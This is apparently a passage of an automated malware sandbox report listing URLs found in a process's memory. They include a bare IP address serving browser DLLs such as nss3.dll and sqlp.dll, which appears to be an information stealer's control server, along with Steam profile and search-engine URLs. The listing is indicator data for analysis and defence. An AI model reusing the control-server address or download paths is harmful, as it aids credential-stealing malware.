                      Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0X
                      Source: file.exeString found in binary or memory: http://ocsp.sectigo.com0
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                      Source: Amcache.hve.3.drString found in binary or memory: http://upx.sf.net
                      Source: aspnet_regiis.exe, 00000003.00000003.1857621759.0000000002DB6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://www.digicert.com/CPS0
                      Source: aspnet_regiis.exe, aspnet_regiis.exe, 00000003.00000002.2680382031.000000006CADD000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                      Source: aspnet_regiis.exe, 00000003.00000002.2662565963.0000000021DBD000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                      Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                      Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://49.12.197.9
                      Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1835858623.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1835103038.0000000002DE2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1835626420.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1835103038.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1811708596.0000000002DE2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1835747383.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/
                      Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/0
                      Source: aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1937588640.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1903702443.0000000002DED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/12.197.9/
                      Source: aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1937588640.0000000002DED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/5
                      Source: aspnet_regiis.exe, 00000003.00000003.1984089930.0000000002DEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/HIIJJJKEGI
                      Source: aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/I
                      Source: aspnet_regiis.exe, 00000003.00000003.1984089930.0000000002DE2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/W
                      Source: aspnet_regiis.exe, 00000003.00000003.1984089930.0000000002DE2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/c
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/freebl3.dll
                      Source: aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/g
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/mozglue.dll(
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/mozglue.dllL
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/msvcp140.dll
                      Source: aspnet_regiis.exe, 00000003.00000003.1972492301.0000000002DE2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/nss3.dll
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/nss3.dll#
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/softokn3.dll
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/softokn3.dllB
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/sqlp.dll
                      Source: aspnet_regiis.exe, 00000003.00000003.1937588640.0000000002DE2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/vcruntime140.dll
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/vcruntime140.dllq
                      Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9CBAAEC
                      Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9FIDBFC
                      Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9JKFIDBFC--
                      Source: aspnet_regiis.exe, 00000003.00000003.1819386724.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp, BGIIEG.3.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                      Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a
                      Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, DBFIEH.3.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, DBFIEH.3.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
                      Source: aspnet_regiis.exe, 00000003.00000003.1819386724.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp, BGIIEG.3.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: aspnet_regiis.exe, 00000003.00000003.1819386724.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp, BGIIEG.3.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: aspnet_regiis.exe, 00000003.00000003.1819386724.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp, BGIIEG.3.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                      Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.co
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/
                      Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a
                      Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
                      Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
                      Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
                      Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
                      Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=2ZRoxzol
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=fWwP
                      Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
